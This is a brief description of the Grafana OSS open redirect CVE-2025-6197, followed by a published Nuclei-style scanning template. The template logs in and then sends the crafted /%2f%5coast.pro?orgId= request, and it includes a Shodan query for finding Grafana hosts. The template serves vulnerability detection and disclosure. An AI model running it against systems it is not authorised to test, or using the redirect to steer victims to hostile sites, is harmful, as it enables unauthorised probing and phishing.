An open redirect vulnerability (CVE-2025-6197) has been identified in the organization-switching functionality of Grafana OSS. Prerequisites for exploitation: multiple organizations must exist in the Grafana instance, and the victim must currently be on a different organization than the one specified in the URL's orgId parameter. As the PoC template below shows, a request for the path /%2f%5coast.pro (which decodes to //\oast.pro) with a foreign orgId makes the org switch answer with a 302 whose Location header is built from that request path; browsers treat a backslash like a forward slash in http(s) URLs, so //\oast.pro resolves as a scheme-relative URL to the external host oast.pro rather than to a path on the Grafana origin.
PoC code (published)
id: CVE-2025-6197

info:
  name: Open Redirect via Organization Switching
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    An open redirect vulnerability has been identified in the organization switching functionality of Grafana OSS. Prerequisites for exploitation: multiple organizations must exist in the Grafana instance, and the victim must be on a different organization than the one specified in the URL.
  reference:
    - https://grafana.com/blog/2025/07/17/grafana-security-release-medium-and-high-severity-fixes-for-cve-2025-6197-and-cve-2025-6023/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6197
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"grafana"
  tags: cve,cve2025,redirect,grafana,open-redirect

variables:
  username: "{{username}}"
  password: "{{password}}"
  orgid: "{{orgid}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        accept: application/json, text/plain, */*
        DNT: 1
        content-type: application/json
        Origin: {{RootURL}}
        Referer: {{RootURL}}/login
        Cookie: redirect_to=%2F

        {"user":"{{username}}","password":"{{password}}"}

    extractors:
      - type: dsl
        dsl:
          - username
          - password

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Logged in'

      - type: word
        part: header
        words:
          - 'grafana_session'

      - type: status
        status:
          - 200

  - raw:
      - |
        GET /%2f%5coast.pro?orgId={{orgid}} HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        name: open-redirect
        dsl:
          - status_code == 302
          - contains(location, '//\oast.pro?')
        condition: and
# digest: 4b0a00483046022100a04708d9dd226ea2b600996ea25617aa4820c81f53f16c9ca5699d9cf7382bbf022100988d23f896135b5222e8a28b11a0bb66e551c283ab44d36e6d3a7734071c8e30:922c64590222798bb761d5b6d8e72950